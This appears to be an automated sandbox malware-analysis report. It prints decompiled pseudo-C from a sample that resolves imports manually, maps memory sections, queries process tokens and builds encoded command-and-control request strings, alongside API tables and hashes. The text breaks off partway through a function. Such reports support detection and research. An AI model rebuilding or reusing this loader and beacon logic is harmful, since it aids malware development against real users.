                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 022242B2
                • memcpy.NTDLL(?,00000000,0000001C), ref: 022242BF
                • NtClose.NTDLL(?), ref: 022242D1
                • NtClose.NTDLL(00000000), ref: 022242DB
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                • String ID:
                • API String ID: 2575439697-0
                • Opcode ID: ad64742998e0cb6ed4abf8839039cf354b978943dc751a90a38dca17688bd510
                • Instruction ID: cb00b43d5fb0cc1e9fc19525a5b03af43c5af6399bd6c3ceea9f91548c9564c2
                • Opcode Fuzzy Hash: ad64742998e0cb6ed4abf8839039cf354b978943dc751a90a38dca17688bd510
                • Instruction Fuzzy Hash: 4021077291022CBBDB11AFE5DC44ADEBFBDEB08750F114122F905A6150D7B29B58DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 358 4015b0-401607 GetSystemTimeAsFileTime 361 401609 358->361 362 40160e-401627 CreateFileMappingW 358->362 361->362 363 401671-401677 GetLastError 362->363 364 401629-401632 362->364 367 401679-40167f 363->367 365 401642-401650 MapViewOfFile 364->365 366 401634-40163b GetLastError 364->366 369 401660-401666 GetLastError 365->369 370 401652-40165e 365->370 366->365 368 40163d-401640 366->368 371 401668-40166f CloseHandle 368->371 369->367 369->371 370->367 371->367
                C-Code - Quality: 69%
                			E004015B0(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                				intOrPtr _v12;
                				struct _FILETIME* _v16;
                				short _v60;
                				struct _FILETIME* _t14;
                				intOrPtr _t15;
                				long _t18;
                				void* _t19;
                				void* _t22;
                				intOrPtr _t31;
                				long _t32;
                				void* _t34;
                
                				_t31 = __edx;
                				_t14 =  &_v16;
                				GetSystemTimeAsFileTime(_t14);
                				_push(0x192);
                				_push(0x54d38000);
                				_push(_v12);
                				_push(_v16);
                				L00402026();
                				_push(_t14);
                				_v16 = _t14;
                				_t15 =  *0x404184;
                				_push(_t15 + 0x4051ca);
                				_push(_t15 + 0x4051c0);
                				_push(0x16);
                				_push( &_v60);
                				_v12 = _t31;
                				L00402020();
                				_t18 = _a4;
                				if(_t18 == 0) {
                					_t18 = 0x1000;
                				}
                				_t19 = CreateFileMappingW(0xffffffff, 0x404188, 4, 0, _t18,  &_v60); // executed
                				_t34 = _t19;
                				if(_t34 == 0) {
                					_t32 = GetLastError();
                				} else {
                					if(_a4 != 0 || GetLastError() == 0xb7) {
                						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                						if(_t22 == 0) {
                							_t32 = GetLastError();
                							if(_t32 != 0) {
                								goto L9;
                							}
                						} else {
                							 *_a8 = _t34;
                							 *_a12 = _t22;
                							_t32 = 0;
                						}
                					} else {
                						_t32 = 2;
                						L9:
                						CloseHandle(_t34);
                					}
                				}
                				return _t32;
                			}














                0x004015b0
                0x004015b9
                0x004015bd
                0x004015c3
                0x004015c8
                0x004015cd
                0x004015d0
                0x004015d3
                0x004015d8
                0x004015d9
                0x004015dc
                0x004015e7
                0x004015ee
                0x004015f2
                0x004015f4
                0x004015f5
                0x004015f8
                0x004015fd
                0x00401607
                0x00401609
                0x00401609
                0x0040161d
                0x00401623
                0x00401627
                0x00401677
                0x00401629
                0x00401632
                0x00401648
                0x00401650
                0x00401662
                0x00401666
                0x00000000
                0x00000000
                0x00401652
                0x00401655
                0x0040165a
                0x0040165c
                0x0040165c
                0x0040163d
                0x0040163f
                0x00401668
                0x00401669
                0x00401669
                0x00401632
                0x0040167f

                APIs
                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00401418,0000000A,?,?), ref: 004015BD
                • CreateFileMappingW.KERNELBASE(000000FF,00404188,00000004,00000000,?,?), ref: 0040161D
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401634
                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401648
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401660
                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A), ref: 00401669
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401671
                Memory Dump Source
                • Source File: 00000000.00000002.517264357.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.517264357.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.517264357.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.517264357.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView
                • String ID:
                • API String ID: 3812556954-0
                • Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
                • Instruction ID: e8584db34bd0864965919452e9e7a980232bfbaa31af8ac4f809374209f4ae08
                • Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
                • Instruction Fuzzy Hash: 1421C8B2500208BFD7119FA4DC84EAF3BACEB44355F14443AFA05F72E0D6758D458B68
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 72%
                			E0040110B(intOrPtr* __eax, void** _a4) {
                				int _v12;
                				void* _v16;
                				void* _v20;
                				void* _v24;
                				int _v28;
                				int _v32;
                				intOrPtr _v36;
                				int _v40;
                				int _v44;
                				void* _v48;
                				void* __esi;
                				long _t34;
                				void* _t39;
                				void* _t47;
                				intOrPtr* _t48;
                
                				_t48 = __eax;
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				_v24 =  *((intOrPtr*)(__eax + 4));
                				_v16 = 0;
                				_v12 = 0;
                				_v48 = 0x18;
                				_v44 = 0;
                				_v36 = 0x40;
                				_v40 = 0;
                				_v32 = 0;
                				_v28 = 0;
                				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                				if(_t34 < 0) {
                					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                				} else {
                					 *_t48 = _v16;
                					_t39 = E00401459(_t48,  &_v12); // executed
                					_t47 = _t39;
                					if(_t47 != 0) {
                						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                					} else {
                						memset(_v12, 0, _v24);
                						 *_a4 = _v12;
                					}
                				}
                				return _t47;
                			}


















                0x00401114
                0x0040111b
                0x0040111c
                0x0040111d
                0x0040111e
                0x0040111f
                0x00401130
                0x00401134
                0x00401148
                0x0040114b
                0x0040114e
                0x00401155
                0x00401158
                0x0040115f
                0x00401162
                0x00401165
                0x00401168
                0x0040116d
                0x004011a8
                0x0040116f
                0x00401172
                0x00401178
                0x0040117d
                0x00401181
                0x0040119f
                0x00401183
                0x0040118a
                0x00401198
                0x00401198
                0x00401181
                0x004011b0

                APIs
                • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74CB4EE0,00000000,00000000,?), ref: 00401168
                  • Part of subcall function 00401459: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
                • memset.NTDLL ref: 0040118A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.517264357.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.517264357.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.517264357.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.517264357.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: Section$CreateViewmemset
                • String ID: @
                • API String ID: 2533685722-2766056989
                • Opcode ID: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
                • Instruction ID: 902b655066e6f1ef2c1749b59dddf7677aeeae3e3ffa194d207bc0e2506ab0da
                • Opcode Fuzzy Hash: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
                • Instruction Fuzzy Hash: 38214DB1D00209AFDB10DFA9C8809EEFBB9FF48314F10453AE616F7250D734AA048B64
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00401000(void* __edi, intOrPtr _a4) {
                				signed int _v8;
                				intOrPtr* _v12;
                				_Unknown_base(*)()** _v16;
                				signed int _v20;
                				signed short _v24;
                				struct HINSTANCE__* _v28;
                				intOrPtr _t43;
                				intOrPtr* _t45;
                				intOrPtr _t46;
                				struct HINSTANCE__* _t47;
                				intOrPtr* _t49;
                				intOrPtr _t50;
                				signed short _t51;
                				_Unknown_base(*)()* _t53;
                				CHAR* _t54;
                				_Unknown_base(*)()* _t55;
                				void* _t58;
                				signed int _t59;
                				_Unknown_base(*)()* _t60;
                				intOrPtr _t61;
                				intOrPtr _t65;
                				signed int _t68;
                				void* _t69;
                				CHAR* _t71;
                				signed short* _t73;
                
                				_t69 = __edi;
                				_v20 = _v20 & 0x00000000;
                				_t59 =  *0x404180;
                				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x18bad598));
                				if(_t43 != 0) {
                					_t45 = _t43 + __edi;
                					_v12 = _t45;
                					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                					if(_t46 != 0) {
                						while(1) {
                							_t71 = _t46 + _t69;
                							_t47 = LoadLibraryA(_t71); // executed
                							_v28 = _t47;
                							if(_t47 == 0) {
                								break;
                							}
                							_v24 = _v24 & 0x00000000;
                							 *_t71 = _t59 - 0x43175ac3;
                							_t49 = _v12;
                							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                							_t50 =  *_t49;
                							if(_t50 != 0) {
                								L6:
                								_t73 = _t50 + _t69;
                								_v16 = _t61 + _t69;
                								while(1) {
                									_t51 =  *_t73;
                									if(_t51 == 0) {
                										break;
                									}
                									if(__eflags < 0) {
                										__eflags = _t51 - _t69;
                										if(_t51 < _t69) {
                											L12:
                											_t21 =  &_v8;
                											 *_t21 = _v8 & 0x00000000;
                											__eflags =  *_t21;
                											_v24 =  *_t73 & 0x0000ffff;
                										} else {
                											_t65 = _a4;
                											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                												goto L12;
                											} else {
                												goto L11;
                											}
                										}
                									} else {
                										_t51 = _t51 + _t69;
                										L11:
                										_v8 = _t51;
                									}
                									_t53 = _v8;
                									__eflags = _t53;
                									if(_t53 == 0) {
                										_t54 = _v24 & 0x0000ffff;
                									} else {
                										_t54 = _t53 + 2;
                									}
                									_t55 = GetProcAddress(_v28, _t54);
                									__eflags = _t55;
                									if(__eflags == 0) {
                										_v20 = _t59 - 0x43175a44;
                									} else {
                										_t68 = _v8;
                										__eflags = _t68;
                										if(_t68 != 0) {
                											 *_t68 = _t59 - 0x43175ac3;
                										}
                										 *_v16 = _t55;
                										_t58 = _t59 * 4 - 0xc5d6b08;
                										_t73 = _t73 + _t58;
                										_t32 =  &_v16;
                										 *_t32 = _v16 + _t58;
                										__eflags =  *_t32;
                										continue;
                									}
                									goto L23;
                								}
                							} else {
                								_t50 = _t61;
                								if(_t61 != 0) {
                									goto L6;
                								}
                							}
                							L23:
                							_v12 = _v12 + 0x14;
                							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                							if(_t46 != 0) {
                								continue;
                							} else {
                							}
                							L26:
                							goto L27;
                						}
                						_t60 = _t59 + 0xbce8a5bb;
                						__eflags = _t60;
                						_v20 = _t60;
                						goto L26;
                					}
                				}
                				L27:
                				return _v20;
                			}




























                0x00401000
                0x00401009
                0x0040100e
                0x00401014
                0x0040101d
                0x00401023
                0x00401025
                0x00401028
                0x0040102d
                0x00401034
                0x00401034
                0x00401038
                0x0040103e
                0x00401043
                0x00000000
                0x00000000
                0x00401049
                0x00401053
                0x00401055
                0x00401058
                0x0040105b
                0x0040105f
                0x00401067
                0x00401069
                0x0040106c
                0x004010d4
                0x004010d4
                0x004010d8
                0x00000000
                0x00000000
                0x00401071
                0x00401077
                0x00401079
                0x0040108c
                0x0040108f
                0x0040108f
                0x0040108f
                0x00401093
                0x0040107b
                0x0040107b
                0x00401083
                0x00401085
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00401085
                0x00401073
                0x00401073
                0x00401087
                0x00401087
                0x00401087
                0x00401096
                0x00401099
                0x0040109b
                0x004010a2
                0x0040109d
                0x0040109d
                0x0040109d
                0x004010aa
                0x004010b0
                0x004010b2
                0x004010e2
                0x004010b4
                0x004010b4
                0x004010b7
                0x004010b9
                0x004010c1
                0x004010c1
                0x004010c6
                0x004010c8
                0x004010cf
                0x004010d1
                0x004010d1
                0x004010d1
                0x00000000
                0x004010d1
                0x00000000
                0x004010b2
                0x00401061
                0x00401061
                0x00401065
                0x00000000
                0x00000000
                0x00401065
                0x004010e5
                0x004010e5
                0x004010ec
                0x004010f1
                0x00000000
                0x00000000
                0x004010f7
                0x00401102
                0x00000000
                0x00401102
                0x004010f9
                0x004010f9
                0x004010ff
                0x00000000
                0x004010ff
                0x0040102d
                0x00401103
                0x00401108

                APIs
                • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401038
                • GetProcAddress.KERNEL32(?,00000000), ref: 004010AA
                Memory Dump Source
                • Source File: 00000000.00000002.517264357.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.517264357.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.517264357.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.517264357.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID:
                • API String ID: 2574300362-0
                • Opcode ID: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
                • Instruction ID: 069ebb05316bb06cd12a0d66d81b5033da0b120a8bf666a49d589dbfec54084e
                • Opcode Fuzzy Hash: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
                • Instruction Fuzzy Hash: 65314975E0020ADFDB14CF59C980AAAB7F4BF04301B24407AD981FB7A0E779DA81CB58
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E00401459(void** __esi, PVOID* _a4) {
                				long _v8;
                				void* _v12;
                				void* _v16;
                				long _t13;
                
                				_v16 = 0;
                				asm("stosd");
                				_v8 = 0;
                				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                				if(_t13 < 0) {
                					_push(_t13);
                					return __esi[6]();
                				}
                				return 0;
                			}







                0x0040146b
                0x00401471
                0x0040147f
                0x00401486
                0x0040148b
                0x00401491
                0x00000000
                0x00401492
                0x00000000

                APIs
                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
                Memory Dump Source
                • Source File: 00000000.00000002.517264357.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.517264357.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.517264357.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.517264357.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: SectionView
                • String ID:
                • API String ID: 1323581903-0
                • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                • Instruction ID: 2ffffb3a0e1fef12aabb3d262299a14fd526f72662b70b4f27343324966f1358
                • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                • Instruction Fuzzy Hash: E9F037B590020CFFDB11DFA5CC85CAFBBBDEB44354B10493AF552E50A0D6309E089B60
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 69%
                			E02223CE0(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
                				intOrPtr _v4;
                				intOrPtr _v8;
                				intOrPtr _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				void* _v48;
                				intOrPtr _v56;
                				void* __edi;
                				intOrPtr _t30;
                				intOrPtr _t33;
                				intOrPtr _t34;
                				intOrPtr _t35;
                				intOrPtr _t36;
                				intOrPtr _t37;
                				void* _t40;
                				intOrPtr _t41;
                				int _t44;
                				intOrPtr _t45;
                				int _t48;
                				void* _t49;
                				intOrPtr _t53;
                				intOrPtr _t59;
                				intOrPtr _t63;
                				intOrPtr* _t65;
                				void* _t66;
                				intOrPtr _t71;
                				intOrPtr _t77;
                				intOrPtr _t80;
                				intOrPtr _t83;
                				int _t86;
                				intOrPtr _t88;
                				int _t91;
                				intOrPtr _t93;
                				int _t96;
                				void* _t98;
                				void* _t99;
                				void* _t103;
                				void* _t105;
                				void* _t106;
                				intOrPtr _t107;
                				long _t109;
                				intOrPtr* _t110;
                				intOrPtr* _t111;
                				long _t112;
                				int _t113;
                				void* _t114;
                				void* _t115;
                				void* _t116;
                				void* _t119;
                				void* _t120;
                				void* _t122;
                				void* _t123;
                
                				_t103 = __edx;
                				_t99 = __ecx;
                				_t120 =  &_v16;
                				_t112 = __eax;
                				_t30 =  *0x222a3e0; // 0x2bd9c20
                				_v4 = _t30;
                				_v8 = 8;
                				_t98 = RtlAllocateHeap( *0x222a2d8, 0, 0x800);
                				if(_t98 != 0) {
                					if(_t112 == 0) {
                						_t112 = GetTickCount();
                					}
                					_t33 =  *0x222a018; // 0x258be91c
                					asm("bswap eax");
                					_t34 =  *0x222a014; // 0x3a87c8cd
                					asm("bswap eax");
                					_t35 =  *0x222a010; // 0xd8d2f808
                					asm("bswap eax");
                					_t36 = E0222A00C; // 0xeec43f25
                					asm("bswap eax");
                					_t37 =  *0x222a348; // 0x9ad5a8
                					_t3 = _t37 + 0x222b5ac; // 0x74666f73
                					_t113 = wsprintfA(_t98, _t3, 2, 0x3d18f, _t36, _t35, _t34, _t33,  *0x222a02c,  *0x222a004, _t112);
                					_t40 = E0222467F();
                					_t41 =  *0x222a348; // 0x9ad5a8
                					_t4 = _t41 + 0x222b575; // 0x74707526
                					_t44 = wsprintfA(_t113 + _t98, _t4, _t40);
                					_t122 = _t120 + 0x38;
                					_t114 = _t113 + _t44;
                					if(_a12 != 0) {
                						_t93 =  *0x222a348; // 0x9ad5a8
                						_t8 = _t93 + 0x222b508; // 0x732526
                						_t96 = wsprintfA(_t114 + _t98, _t8, _a12);
                						_t122 = _t122 + 0xc;
                						_t114 = _t114 + _t96;
                					}
                					_t45 =  *0x222a348; // 0x9ad5a8
                					_t10 = _t45 + 0x222b246; // 0x74636126
                					_t48 = wsprintfA(_t114 + _t98, _t10, 0);
                					_t123 = _t122 + 0xc;
                					_t115 = _t114 + _t48; // executed
                					_t49 = E0222472F(_t99); // executed
                					_t105 = _t49;
                					if(_t105 != 0) {
                						_t88 =  *0x222a348; // 0x9ad5a8
                						_t12 = _t88 + 0x222b8d0; // 0x736e6426
                						_t91 = wsprintfA(_t115 + _t98, _t12, _t105);
                						_t123 = _t123 + 0xc;
                						_t115 = _t115 + _t91;
                						HeapFree( *0x222a2d8, 0, _t105);
                					}
                					_t106 = E02221340();
                					if(_t106 != 0) {
                						_t83 =  *0x222a348; // 0x9ad5a8
                						_t14 = _t83 + 0x222b8c5; // 0x6f687726
                						_t86 = wsprintfA(_t115 + _t98, _t14, _t106);
                						_t123 = _t123 + 0xc;
                						_t115 = _t115 + _t86;
                						HeapFree( *0x222a2d8, 0, _t106);
                					}
                					_t107 =  *0x222a3cc; // 0x2bd9600
                					_a20 = E02226B59(0x222a00a, _t107 + 4);
                					_t53 =  *0x222a36c; // 0x2bd95b0
                					_t109 = 0;
                					if(_t53 != 0) {
                						_t80 =  *0x222a348; // 0x9ad5a8
                						_t17 = _t80 + 0x222b8be; // 0x3d736f26
                						wsprintfA(_t115 + _t98, _t17, _t53);
                					}
                					if(_a20 != _t109) {
                						_t116 = RtlAllocateHeap( *0x222a2d8, _t109, 0x800);
                						if(_t116 != _t109) {
                							E02222915(GetTickCount());
                							_t59 =  *0x222a3cc; // 0x2bd9600
                							__imp__(_t59 + 0x40);
                							asm("lock xadd [eax], ecx");
                							_t63 =  *0x222a3cc; // 0x2bd9600
                							__imp__(_t63 + 0x40);
                							_t65 =  *0x222a3cc; // 0x2bd9600
                							_t66 = E02226675(1, _t103, _t98,  *_t65); // executed
                							_t119 = _t66;
                							asm("lock xadd [eax], ecx");
                							if(_t119 != _t109) {
                								StrTrimA(_t119, 0x2229280);
                								_push(_t119);
                								_t71 = E02227563();
                								_v20 = _t71;
                								if(_t71 != _t109) {
                									_t110 = __imp__;
                									 *_t110(_t119, _v8);
                									 *_t110(_t116, _v8);
                									_t111 = __imp__;
                									 *_t111(_t116, _v32);
                									 *_t111(_t116, _t119);
                									_t77 = E022221A6(0xffffffffffffffff, _t116, _v28, _v24); // executed
                									_v56 = _t77;
                									if(_t77 != 0 && _t77 != 0x10d2) {
                										E022263F6();
                									}
                									HeapFree( *0x222a2d8, 0, _v48);
                									_t109 = 0;
                								}
                								HeapFree( *0x222a2d8, _t109, _t119);
                							}
                							RtlFreeHeap( *0x222a2d8, _t109, _t116); // executed
                						}
                						HeapFree( *0x222a2d8, _t109, _a12);
                					}
                					RtlFreeHeap( *0x222a2d8, _t109, _t98); // executed
                				}
                				return _v16;
                			}

























































                0x02223ce0
                0x02223ce0
                0x02223ce0
                0x02223cf5
                0x02223cf7
                0x02223cfc
                0x02223d00
                0x02223d0e
                0x02223d12
                0x02223d1a
                0x02223d22
                0x02223d22
                0x02223d24
                0x02223d30
                0x02223d3f
                0x02223d44
                0x02223d47
                0x02223d4c
                0x02223d4f
                0x02223d54
                0x02223d57
                0x02223d63
                0x02223d70
                0x02223d72
                0x02223d78
                0x02223d7d
                0x02223d88
                0x02223d8a
                0x02223d8d
                0x02223d93
                0x02223d95
                0x02223d9e
                0x02223da9
                0x02223dab
                0x02223dae
                0x02223dae
                0x02223db0
                0x02223db5
                0x02223dc1
                0x02223dc3
                0x02223dc6
                0x02223dc8
                0x02223dcd
                0x02223dd1
                0x02223dd3
                0x02223dd8
                0x02223de4
                0x02223de6
                0x02223df2
                0x02223df4
                0x02223df4
                0x02223dff
                0x02223e03
                0x02223e05
                0x02223e0a
                0x02223e16
                0x02223e18
                0x02223e24
                0x02223e26
                0x02223e26
                0x02223e2c
                0x02223e3f
                0x02223e43
                0x02223e48
                0x02223e4c
                0x02223e4f
                0x02223e54
                0x02223e5e
                0x02223e60
                0x02223e67
                0x02223e7f
                0x02223e83
                0x02223e8f
                0x02223e94
                0x02223e9d
                0x02223eae
                0x02223eb2
                0x02223ebb
                0x02223ec1
                0x02223ec9
                0x02223ece
                0x02223edb
                0x02223ee1
                0x02223eed
                0x02223ef3
                0x02223ef4
                0x02223ef9
                0x02223eff
                0x02223f05
                0x02223f0c
                0x02223f13
                0x02223f19
                0x02223f20
                0x02223f24
                0x02223f2f
                0x02223f34
                0x02223f3a
                0x02223f43
                0x02223f43
                0x02223f54
                0x02223f5a
                0x02223f5a
                0x02223f64
                0x02223f64
                0x02223f72
                0x02223f72
                0x02223f83
                0x02223f83
                0x02223f91
                0x02223f91
                0x02223fa2

                APIs
                • RtlAllocateHeap.NTDLL ref: 02223D08
                • GetTickCount.KERNEL32 ref: 02223D1C
                • wsprintfA.USER32 ref: 02223D6B
                • wsprintfA.USER32 ref: 02223D88
                • wsprintfA.USER32 ref: 02223DA9
                • wsprintfA.USER32 ref: 02223DC1
                • wsprintfA.USER32 ref: 02223DE4
                • HeapFree.KERNEL32(00000000,00000000), ref: 02223DF4
                • wsprintfA.USER32 ref: 02223E16
                • HeapFree.KERNEL32(00000000,00000000), ref: 02223E26
                • wsprintfA.USER32 ref: 02223E5E
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02223E79
                • GetTickCount.KERNEL32 ref: 02223E89
                • RtlEnterCriticalSection.NTDLL(02BD95C0), ref: 02223E9D
                • RtlLeaveCriticalSection.NTDLL(02BD95C0), ref: 02223EBB
                  • Part of subcall function 02226675: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,7491C740,02223ECE,00000000,02BD9600), ref: 022266A0
                  • Part of subcall function 02226675: lstrlen.KERNEL32(00000000,?,7491C740,02223ECE,00000000,02BD9600), ref: 022266A8
                  • Part of subcall function 02226675: strcpy.NTDLL ref: 022266BF
                  • Part of subcall function 02226675: lstrcat.KERNEL32(00000000,00000000), ref: 022266CA
                  • Part of subcall function 02226675: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02223ECE,?,7491C740,02223ECE,00000000,02BD9600), ref: 022266E7
                • StrTrimA.SHLWAPI(00000000,02229280,00000000,02BD9600), ref: 02223EED
                  • Part of subcall function 02227563: lstrlen.KERNEL32(02BD9C10,00000000,00000000,00000000,02223EF9,00000000), ref: 02227573
                  • Part of subcall function 02227563: lstrlen.KERNEL32(?), ref: 0222757B
                  • Part of subcall function 02227563: lstrcpy.KERNEL32(00000000,02BD9C10), ref: 0222758F
                  • Part of subcall function 02227563: lstrcat.KERNEL32(00000000,?), ref: 0222759A
                • lstrcpy.KERNEL32(00000000,?), ref: 02223F0C
                • lstrcpy.KERNEL32(00000000,?), ref: 02223F13
                • lstrcat.KERNEL32(00000000,?), ref: 02223F20
                • lstrcat.KERNEL32(00000000,00000000), ref: 02223F24
                  • Part of subcall function 022221A6: WaitForSingleObject.KERNEL32(00000000,74CF81D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02222258
                • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 02223F54
                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02223F64
                • RtlFreeHeap.NTDLL(00000000,00000000,00000000,02BD9600), ref: 02223F72
                • HeapFree.KERNEL32(00000000,?), ref: 02223F83
                • RtlFreeHeap.NTDLL(00000000,00000000), ref: 02223F91
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$AllocateCountCriticalSectionTickTrim$EnterLeaveObjectSingleWaitstrcpy
                • String ID:
                • API String ID: 186568778-0
                • Opcode ID: b0bfa2cfdae719420f26e83ec9e07d08310fbf02d201a566fb003669c7995084
                • Instruction ID: 368f13e3994a770c69079c44713d8c565356ca9248c358b6918d0e5dae7151a4
                • Opcode Fuzzy Hash: b0bfa2cfdae719420f26e83ec9e07d08310fbf02d201a566fb003669c7995084
                • Instruction Fuzzy Hash: 2F71BF31840215BFC731EBE4FC4CE963BE9EB88700B161A15F909D7220DA379A6CDB61
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 92%
                			E02227B83(void* __eax, void* __ecx, long __esi, char* _a4) {
                				void _v8;
                				long _v12;
                				void _v16;
                				void* _t34;
                				void* _t38;
                				void* _t40;
                				char* _t56;
                				long _t57;
                				void* _t58;
                				intOrPtr _t59;
                				long _t65;
                
                				_t65 = __esi;
                				_t58 = __ecx;
                				_v16 = 0xea60;
                				__imp__( *(__esi + 4));
                				_v12 = __eax + __eax;
                				_t56 = E022233DC(__eax + __eax + 1);
                				if(_t56 != 0) {
                					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
                						E022261DA(_t56);
                					} else {
                						E022261DA( *(__esi + 4));
